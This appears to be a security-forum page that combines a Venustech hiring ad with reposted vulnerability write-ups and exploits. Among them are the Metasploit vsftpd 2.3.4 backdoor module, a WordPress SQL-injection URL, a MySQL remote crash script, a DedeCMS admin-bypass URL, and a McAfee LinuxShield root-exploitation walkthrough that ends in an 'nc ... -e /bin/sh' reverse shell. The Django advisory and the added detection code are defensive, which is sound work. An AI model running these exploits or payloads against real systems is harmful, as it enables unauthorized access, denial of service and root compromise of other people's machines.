[Recruitment] [Hiring] Venustech (启明星辰) R&D Recruitment

  • Position: Other
  • Company: Venustech (启明星辰)
  • Location: Beijing
  • Field required: Other
  • Education required: Bachelor's degree
  • Work experience: 2+ years
  • Salary: Negotiable
  • Age requirement: None
  • Gender requirement: None
  • Company website: http://www.venustech.com.cn
  • Résumé e-mail: xiaoyan@sitedirsec.com
  • Contact phone: 00000000000
  • Online QQ:
  • Security assistant: recruit or job-hunt through the 非安全中国 site administrators, QQ group: 57116771


  • ++++++++++ Notes on Venustech ++++++++++

    Just send me a private message on the forum.

    I. R&D Centre: Linux C Software Engineer (several openings)

    Responsibilities:

    1. Software development and maintenance for embedded devices such as security gateways, firewalls and IPS

    Requirements:

    1. Proficient in C programming
    2. Skilled Linux user, proficient in C programming under Linux
    3. Proficient in TCP/IP and other network protocols; familiar with application-layer protocols and protocol analysis
    4. Familiar with network security protocols and with security devices such as routers, switches and firewalls
    5. Familiar with the Linux kernel and kernel development

    II. R&D Centre: Test Engineer (several openings)

    Responsibilities:

    1. System testing and integration testing of products
    2. Writing, executing and revising product test cases
    3. Product performance testing
    4. Support and testing for external projects

    Requirements:

    1. Basic TCP/IP knowledge
    2. Good data-communications fundamentals
    3. Some Linux background
    4. Able to set up and use databases
    5. Familiar with at least one programming language: C/Perl/VBS/TCL
    6. Familiar with test-case design, system testing and stress testing
    7. Familiar with firewall principles and with some firewall features
    8. Some understanding of how network security devices are deployed in networks
    9. Able to use test tools: LoadRunner, packet-analysis software, Spirent or IXIA test equipment

    III. R&D Centre: Security Event Engineer (several openings)

    Responsibilities:

    1. Delivery of trojan detection and web vulnerability scanning services
    2. Technical support for service customers
    3. Research on web trojans, web vulnerabilities, worms, scanning, denial of service, buffer overflows and similar
    4. Routine upgrades and maintenance of the security event databases for IDS/IPS/UTM/TDS/WAG/322 and other products
    5. Research on attack techniques, TCP/IP protocols and reverse engineering



VSFTPD v2.3.4 Backdoor Command Execution Vulnerability

    ##
    # $Id: vsftpd_234_backdoor.rb 13099 2011-07-05 05:20:47Z hdm $
    ##

    ##
    # This file is part of the Metasploit Framework and may be subject to
    # redistribution and commercial restrictions. Please see the Metasploit
    # Framework web site for more information on licensing and terms of use.
    # http://metasploit.com/framework/
    ##

    require 'msf/core'

    class Metasploit3 < Msf::Exploit::Remote
      Rank = ExcellentRanking

      include Msf::Exploit::Remote::Tcp

      def initialize(info = {})
        super(update_info(info,
          'Name'           => 'VSFTPD v2.3.4 Backdoor Command Execution',
          'Description'    => %q{
              This module exploits a malicious backdoor that was added to the VSFTPD download
              archive. This backdoor was introduced into the vsftpd-2.3.4.tar.gz archive between
              June 30th 2011 and July 1st 2011 according to the most recent information
              available. This backdoor was removed on July 3rd 2011.
          },
          'Author'         => [ 'hdm', 'mc' ],
          'License'        => MSF_LICENSE,
          'Version'        => '$Revision: 13099 $',
          'References'     =>
            [
              [ 'URL', 'http://pastebin.com/AetT9sS5' ],
              [ 'URL', 'http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html' ]
            ],
          'Privileged'     => true,
          'Platform'       => [ 'unix' ],
          'Arch'           => ARCH_CMD,
          'Payload'        =>
            {
              'Space'       => 2000,
              'BadChars'    => '',
              'DisableNops' => true,
              'Compat'      =>
                {
                  'PayloadType'    => 'cmd_interact',
                  'ConnectionType' => 'find',
                },
            },
          'Targets'        =>
            [
              [ 'Automatic', { } ],
            ],
          'DisclosureDate' => 'Jul 3 2011',
          'DefaultTarget'  => 0))

        register_options([ Opt::RPORT(21) ], self.class)
      end

      def exploit

        # If the backdoor listener is already up, skip the trigger and use it directly
        nsock = self.connect(false, {'RPORT' => 6200}) rescue nil
        if nsock
          print_status("The port used by the backdoor bind listener is already open")
          handle_backdoor(nsock)
          return
        end

        # Connect to the FTP service port first
        connect

        banner = sock.get_once(-1, 30).to_s
        print_status("Banner: #{banner.strip}")

        # A USER name ending in ":)" is what arms the backdoor
        sock.put("USER #{rand_text_alphanumeric(rand(6)+1)}:)\r\n")

        resp = sock.get_once(-1, 30).to_s
        print_status("USER: #{resp.strip}")

        if resp =~ /^530 /
          print_error("This server is configured for anonymous only and the backdoor code cannot be reached")
          disconnect
          return
        end

        if resp !~ /^331 /
          print_error("This server did not respond as expected: #{resp.strip}")
          disconnect
          return
        end

        sock.put("PASS #{rand_text_alphanumeric(rand(6)+1)}\r\n")

        # Do not bother reading the response from password, just try the backdoor
        nsock = self.connect(false, {'RPORT' => 6200}) rescue nil
        if nsock
          print_good("Backdoor service has been spawned, handling...")
          handle_backdoor(nsock)
          return
        end

        disconnect

      end

      def handle_backdoor(s)

        s.put("id\n")

        r = s.get_once(-1, 5).to_s
        if r !~ /uid=/
          print_error("The service on port 6200 does not appear to be a shell")
          disconnect(s)
          return
        end

        print_good("UID: #{r.strip}")

        s.put("nohup " + payload.encoded + " >/dev/null 2>&1")
        handler(s)
      end

    end

Announcement: https://www.sitedirsec.com publishes the latest vulnerabilities, please follow.
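Detection logic for the trigger the module above sends, as an added example in Python (not part of the original post or of the Metasploit module): the backdoor is armed by a USER name ending in ":)" and then listens on TCP port 6200, so a defender can flag the trigger on the control channel and correlate it with a follow-up connection to 6200. The log format, client addresses and the "CONNECT" event are constructed assumptions for the example, not any real server's format.

```python
import re

# Constructed sample lines (not a real server's log format), one event per line:
#   <timestamp> <client_ip> C <command sent by client>
#   <timestamp> <client_ip> S <reply sent by server>
#   <timestamp> <client_ip> CONNECT dport=<port>   (client opened a new TCP connection)
SAMPLE_LOG = """\
2011-07-04T10:00:01Z 192.0.2.10 C USER alice
2011-07-04T10:00:02Z 192.0.2.10 S 331 Please specify the password.
2011-07-04T10:00:03Z 192.0.2.10 C PASS ******
2011-07-04T10:00:04Z 192.0.2.10 S 230 Login successful.
2011-07-04T10:05:00Z 198.51.100.7 C USER 3f9Kq:)
2011-07-04T10:05:01Z 198.51.100.7 S 331 Please specify the password.
2011-07-04T10:05:02Z 198.51.100.7 C PASS ******
2011-07-04T10:05:03Z 198.51.100.7 CONNECT dport=6200
2011-07-04T10:07:00Z 203.0.113.5 C USER bob:)
2011-07-04T10:07:01Z 203.0.113.5 S 530 This FTP server is anonymous only.
"""

USER_RE = re.compile(r"^\S+ (?P<ip>\S+) C USER (?P<name>.*)$")
REPLY_RE = re.compile(r"^\S+ (?P<ip>\S+) S (?P<code>\d{3})\b")
CONN_RE = re.compile(r"^\S+ (?P<ip>\S+) CONNECT dport=(?P<port>\d+)$")

# Port the backdoored build listens on once triggered (from the module above).
BACKDOOR_PORT = 6200


def is_trigger_username(name):
    """True if the USER argument ends in the ":)" sequence that arms the backdoor.

    The backdoor only looks at the tail of the username, so any account name
    with ":)" appended trips it; trailing CR/LF or spaces are stripped first.
    """
    return name.rstrip("\r\n ").endswith(":)")


def analyze_ftp_log(text):
    """Map each client IP that sent the trigger to the most severe verdict seen.

    Verdicts, in increasing severity:
      trigger_rejected_530         USER refused (anonymous-only server; the backdoor
                                   code is not reached, mirroring the module's 530 check)
      trigger_sent                 USER accepted (331) or no reply observed
      backdoor_listener_contacted  same client then opened a connection to port 6200
    """
    findings = {}
    for line in text.splitlines():
        m = USER_RE.match(line)
        if m:
            if is_trigger_username(m.group("name")):
                findings[m.group("ip")] = "trigger_sent"
            continue
        m = REPLY_RE.match(line)
        if m and findings.get(m.group("ip")) == "trigger_sent":
            if m.group("code") == "530":
                findings[m.group("ip")] = "trigger_rejected_530"
            continue
        m = CONN_RE.match(line)
        if m and m.group("ip") in findings and int(m.group("port")) == BACKDOOR_PORT:
            findings[m.group("ip")] = "backdoor_listener_contacted"
    return findings


if __name__ == "__main__":
    for ip, verdict in analyze_ftp_log(SAMPLE_LOG).items():
        print(f"{ip}: {verdict}")
```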

WordPress Event List Plugin <= 0.7.8 - SQL Injection Vulnerability

1. Description:

SQL injection vulnerability in the Event List plugin 0.7.8 for WordPress
allows an authenticated user to execute arbitrary SQL commands via the id
parameter to wp-admin/admin.php.

2. Proof of Concept:

http://[wordpress_site]/wp-admin/admin.php?page=el_admin_main&action=edit&id=1 AND SLEEP(10)

3. Solution:

The plugin has been removed from WordPress. Deactivate the plug-in and wait
for a hotfix.

4. Reference:

http://dtsa.eu/cve-2017-9429-event-list-version-v-0-7-8-blind-based-sql-injection-sqli/
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-9429

MySQL 5.5.8 Remote Denial of Service Vulnerability

    import socket, sys

    print ""
    print "----------------------------------------------------------------"
    print "| MySQL 5.5.8 Null Ptr (windows)                                |"
    print "| Level Smash the Stack                                         |"
    print "----------------------------------------------------------------"
    print ""

    # Client handshake response: 3-byte length (0x26), sequence 1, capability flags,
    # max packet size, charset, 23 reserved bytes, user "root", empty auth response
    buf=("&\x00\x00\x01\x85\xa2\x03\x00\x00\x00\x00@\x93\x00\x00\x00\x00\x00\x00\x00\x00"
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00root\x00\x00")

    # COM_QUERY packet (length 0x11) sent before the handshake has completed
    buf2=("\x11\x00\x00\x00\x03set autocommit=0")

    def usage():
        print "usage : ./mysql.py <victim_ip>"
        print "example: ./mysql.py 192.168.1.22"

    def main():
        if len(sys.argv) != 2:
            usage()
            sys.exit()
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

        HOST = sys.argv[1]
        PORT = int(3306)
        s.connect((HOST,PORT))
        print "[*] Connect"
        s.send(buf)
        print "[*] Payload 1 sent"
        s.send(buf2)
        print "[*] Payload 2 sent", "[*] Run again to ensure it is down.."
        s.close()

    if __name__ == "__main__":
        main()

Step-by-Step Linux Installation: Setting Up the Virtual Machine

http://www.sitedir.com.cn/video/4.swf

DedeCMS (织梦) v5.6-5.7 Unauthorized Access Vulnerability

http://www.XXXX.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root

Change validate=dcug in the URL above to the current captcha value and you are taken straight into the site's admin backend.

The precondition for this vulnerability is that the admin backend path must be known.

Official temporary fix:

Find the file include/common.inc.php and replace:

    foreach($_REQUEST as $_k=>$_v)
    {
        var_dump($_k);
        if( strlen($_k)>0 && preg_match('#^(cfg_|GLOBALS)#',$_k) )
        {
            exit('Request var not allow!');
        }
    }

with:

    //Check and register externally submitted variables
    function CheckRequest(&$val) {
        if (is_array($val)) {
            foreach ($val as $_k=>$_v) {
                CheckRequest($_k);
                CheckRequest($val[$_k]);
            }
        } else
        {
            if( strlen($val)>0 && preg_match('#^(cfg_|GLOBALS)#',$val) )
            {
                exit('Request var not allow!');
            }
        }
    }
    CheckRequest($_REQUEST);
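Why the original flat loop misses the nested key and the recursive replacement catches it, as an added example in Python (not DedeCMS code): it models how PHP turns bracket syntax in the query string into nested arrays and then applies both filters quoted above. The request strings are constructed; the keys are the ones from the URL above, the database host value is a documentation address.

```python
import re
from urllib.parse import parse_qsl

# Pattern used by both DedeCMS filters above (PHP '#^(cfg_|GLOBALS)#').
BLOCKED = re.compile(r"^(cfg_|GLOBALS)")


def php_parse_query(qs):
    """Minimal model of how PHP builds $_REQUEST from a query string.

    PHP turns bracket syntax into nested arrays, so
    _POST[GLOBALS][cfg_dbhost]=x becomes {'_POST': {'GLOBALS': {'cfg_dbhost': 'x'}}}.
    """
    root = {}
    for key, value in parse_qsl(qs, keep_blank_values=True):
        m = re.match(r"^([^\[]+)((?:\[[^\]]*\])*)$", key)
        if not m:
            root[key] = value
            continue
        path = [m.group(1)] + re.findall(r"\[([^\]]*)\]", m.group(2))
        node = root
        for part in path[:-1]:
            if not isinstance(node.get(part), dict):
                node[part] = {}
            node = node[part]
        node[path[-1]] = value
    return root


def flat_check(request):
    """The original include/common.inc.php loop: only top-level keys are examined.

    Returns True when the request would be accepted. A nested
    _POST[GLOBALS][cfg_dbhost] arrives under the harmless top-level key '_POST',
    so it passes and can later overwrite the database settings.
    """
    for key in request:
        if len(key) > 0 and BLOCKED.match(key):
            return False
    return True


def recursive_check(val):
    """The patched CheckRequest(): recurse into arrays, testing every key and value.

    Returns True when accepted. Note that the patch also rejects scalar *values*
    starting with cfg_ or GLOBALS, not only keys; that mirrors the fix as posted.
    """
    if isinstance(val, dict):
        return all(recursive_check(k) and recursive_check(v) for k, v in val.items())
    return not (len(val) > 0 and BLOCKED.match(val))


# Constructed requests: the keys are those from the advisory above; the
# database host is a documentation address, not the one in the post.
ATTACK_QS = ("dopost=login&validate=dcug&userid=admin&pwd=inimda"
             "&_POST[GLOBALS][cfg_dbhost]=203.0.113.9"
             "&_POST[GLOBALS][cfg_dbuser]=root")
NORMAL_QS = "dopost=login&validate=dcug&userid=admin&pwd=secret"


if __name__ == "__main__":
    req = php_parse_query(ATTACK_QS)
    print("flat filter accepts attack request:", flat_check(req))            # True
    print("recursive filter accepts attack request:", recursive_check(req))  # False
```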

Step-by-Step Linux Installation: Setting Up Virtual Machine Tools

http://www.sitedir.com.cn/video/8.swf

Multiple Security Vulnerabilities in the Django Development Framework
Published: 2011-09-12

Affected versions:
Django 1.2.5
Django 1.3 beta 1
Django 1.2.4
Django 1.2.2
Django 1.2

Vulnerability description:

Django is an open-source web application framework written in Python.
Django contains multiple security vulnerabilities that allow attackers to obtain sensitive information, manipulate data, carry out cache poisoning attacks or cause a denial of service.
1) When a cache backend is used, an error in session handling in django.contrib.sessions can be exploited to manipulate session data. Successful exploitation requires that the session key is known and that the application lets an attacker store a dictionary-like object in the cache under a valid session key.
2) Django's model system includes a field type, URLField, used to validate that a supplied value is a valid URL; if the boolean keyword argument verify_exists is true, it attempts to verify the supplied URL by resolving it. By default the underlying socket has no timeout, so an attacker can send specially crafted URLs that consume all server memory, causing a denial of service.
3) An error in handling redirect responses when validating URLs supplied to the URLField field type lets an attacker answer with a redirect to a "file://" URL and thereby determine whether local files on the server exist.
4) An error in handling the "X-Forwarded-Host" HTTP header when generating the full URL of a redirect response can be exploited for cache poisoning.

Details:
https://www.djangoproject.com/weblog/2011/sep/09/security-releases-issued/
http://secunia.com/advisories/45939/

McAfee LinuxShield Local/Remote Code Execution Vulnerability

McAfee LinuxShield remote/local code
Affected versions: McAfee LinuxShield <= 1.5.1
Remote attack: Yes
Local overflow: Yes

Background reading:
===========

LinuxShield detects and removes viruses and other potentially unwanted
software on Linux-based systems. LinuxShield uses the powerful McAfee
scanning engine, the engine common to all our anti-virus products.

Although a few years ago, the Linux operating system was considered a
secure environment, it is now seeing more occurrences of software
specifically written to attack or exploit security weaknesses in
Linux-based systems. Increasingly, Linux-based systems interact with
Windows-based computers. Although viruses written to attack Windows-
based systems do not directly attack Linux systems, a Linux server
can harbor these viruses, ready to infect any client that connects to
it.

When installed on your Linux systems, LinuxShield provides protection
against viruses, Trojan horses, and other types of potentially
unwanted software.

LinuxShield scans files as they are opened and closed, a technique
known as on-access scanning. LinuxShield also incorporates an
on-demand scanner that enables you to scan any directory or file in
your host at any time.

When kept up-to-date with the latest virus-definition (DAT) files,
LinuxShield is an important part of your network security. We
recommend that you set up an anti-virus security policy for your
network, incorporating as many protective measures as possible.

LinuxShield uses a web-browser interface, and a large number of
LinuxShield installations can be centrally controlled by ePolicy
Orchestrator.

(Product description from LinuxShield Product Guide)


Description:
============

This vulnerability allows remote attackers to execute arbitrary code
on vulnerable installations of McAfee LinuxShield. User interaction
is not required to exploit this vulnerability but an attacker must
be authenticated.

The LinuxShield web interface communicates with the locally installed
"nailsd" daemon, which listens on port 65443/tcp, to do configuration
changes, query the configuration and execute tasks.

Each user who can log in to the victim box can also authenticate
itself to the "nailsd" and can do configuration changes and execute
tasks with root privileges.

A direct execution of commands is not possible, but it is possible to
download and execute code through manipulation of the config and
execute scheduled tasks of the LinuxShield.


walk-through (after the TLS handshake):
+--------------------------------------

nailsd > +OK welcome to the NAILS Statistics Service
attacker> auth <user> <pass>
nailsd > +OK successful authentication

# Set the Attacker repository to download our code from a httpd
# (catalog.z)
#---------------------------------------------------------------
attacker> db set 1 _table=repository status=1 siteList=<?xml version="1.0"
encoding="UTF-8"?><ns:SiteLists xmlns:ns="naSiteList"
GlobalVersion="20030131003110" LocalVersion="20091209161903" Type="Client">
<SiteList Default="1" Name="SomeGUID"><HttpSite Type="repository"
Name="EvilRepo" Order="1" Server="<attackerhost>:80" Enabled="1" Local="1">
<RelativePath>nai</RelativePath><UseAuth>0</UseAuth><UserName></UserName>
<Password Encrypted="0"/></HttpSite></SiteList></ns:SiteLists> _cmd=update
nailsd > +OK database changes buffered.

# Execute task to set the attacker repository
#---------------------------------------------------------------
attacker> task setsitelist
nailsd > +OK setting sitelist from CMA.

# Execute the default Update task to download the code
#---------------------------------------------------------------
attacker> task nstart LinuxShield Update
nailsd > +OK task LinuxShield Update starting

# Create a Scan profile, which executes our code. The profiles are
# not stored in the database.
# Scan Profiles: /var/opt/NAI/LinuxShield/etc/ods.cfg
#---------------------------------------------------------------
attacker> sconf ODS_99 begin
nailsd > +OK 1260400888

# Set the variable "nailsd.profile.ODS_99.scannerPath" to the path
# where our earlier downloaded catalog.z file is stored.
# (/opt/McAfee/cma/scratch/update/catalog.z)
#---------------------------------------------------------------
attacker> sconf ODS_99 set 1260400888 nailsd.profile.ODS_99.allFiles=
true nailsd.profile.ODS_99.childInitTmo=60 nailsd.profile.O
DS_99.cleanChildren=2 nailsd.profile.ODS_99.cleansPerChild=
10000 nailsd.profile.ODS_5.datPath=/opt/NAI/LinuxShield/eng
ine/dat nailsd.profile.ODS_99.decompArchive=true nailsd.pro
file.ODS_99.decompExe=true nailsd.profile.ODS_99.engineLibD
ir=/opt/NAI/LinuxShield/engine/lib nailsd.profile.ODS_99.en
ginePath=/opt/NAI/LinuxShield/engine/lib/liblnxfv.so nailsd
.profile.ODS_99.factoryInitTmo=60 nailsd.profile.ODS_99.heu
risticAnalysis=true nailsd.profile.ODS_99.macroAnalysis=tru
e nailsd.profile.ODS_99.maxQueSize=32 nailsd.profile.ODS_99
.mime=true nailsd.profile.ODS_99.noJokes=false nailsd.profi
le.ODS_99.program=true nailsd.profile.ODS_99.quarantineChil
dren=1 nailsd.profile.ODS_99.quarantineDirectory=/quarantin
e nailsd.profile.ODS_99.quarantinesPerChild=10000 nailsd.pr
ofile.ODS_99.scanChildren=2 nailsd.profile.ODS_99.scanMaxTm
o=301 nailsd.profile.ODS_99.scanNWFiles=true nailsd.profile
.ODS_99.scanOnRead=true nailsd.profile.ODS_99.scanOnWrite=t
rue nailsd.profile.ODS_99.scannerPath=/opt/McAfee/cma/scrat
ch/update/catalog.z nailsd.profile.ODS_99.scansPerChild=100
00 nailsd.profile.ODS_99.slowScanChildren=0 nailsd.profile.
ODS_99.filter.0.type=exclude-path nailsd.profile.ODS_99.fil
ter.0.path=/proc nailsd.profile.ODS_99.filter.0.subdir=true
nailsd.profile.ODS_99.filter.extensions.mode=all nailsd.pr
ofile.ODS_99.filter.extensions.type=extension nailsd.profil
e.ODS_99.action.Default.primary=Clean nailsd.profile.ODS_99
.action.Default.secondary=Quarantine nailsd.profile.ODS_99.
action.App.primary=Clean nailsd.profile.ODS_99.action.App.s
econdary=Quarantine nailsd.profile.ODS_99.action.timeout=Pa
ss nailsd.profile.ODS_99.action.error=Block
nailsd > +OK configuration changes buffered
attacker> sconf ODS_99 commit 1260400888
nailsd > +OK configuration changes stored

# Set a scan task with the manipulated profile to execute the code
#---------------------------------------------------------------
attacker> db set 1260400888 _table=schedule taskName=Evil Task taskTy
pe=On-Demand taskInfo=profileName=ODS_99,paths=path:/root/t
mp;exclude:false timetable=type=unscheduled taskResults=0 i
_lastRun=1260318482 status=Stopped _cmd=insert
nailsd > +OK database changes buffered

# Execute scan task to execute the code
#---------------------------------------------------------------
attacker> task nstart Evil Task

+-------------------------------------- walk-through EOF


To get a reverse root shell place something like this in the catalog.z

--- snip ---
#!/bin/sh
nc -nv <attacker_host> 4444 -e /bin/sh
--- /snip ---


Proof of Concept :
==================

http://inj3ct0r.com/sploits/11165.tar.gz


Solution:
=========

McAfee Advisory
+--------------
https://kc.mcafee.com/corporate/index?page=content&id=SB10007


Disclosure Timeline (YYYY/MM/DD):
=================================

2009.12.07: Vulnerability found
2010.02.03: Asked vendor for a PGP key
2010.02.05: Vendor sent his PGP key
2010.02.05: Sent PoC, Advisory, Disclosure policy and planned disclosure
            date (2010.02.18) to Vendor
2010.02.05: Vendor acknowledges the reception of the advisory
2010.02.16: Ask for a status update, because the planned release date is
            2010.02.18.
2010.02.16: Vendor response that they are currently working on a patch
2010.02.17: Changed release date to 2010.02.25.
2010.02.22: Vendor gives a status update, that they are able to release
            the patch on 2010.02.25.
2010.02.24: Ask for a list of affected products and the advisory url.
2010.02.24: Vendor sends the list.
2010.03.02: Release of this Advisory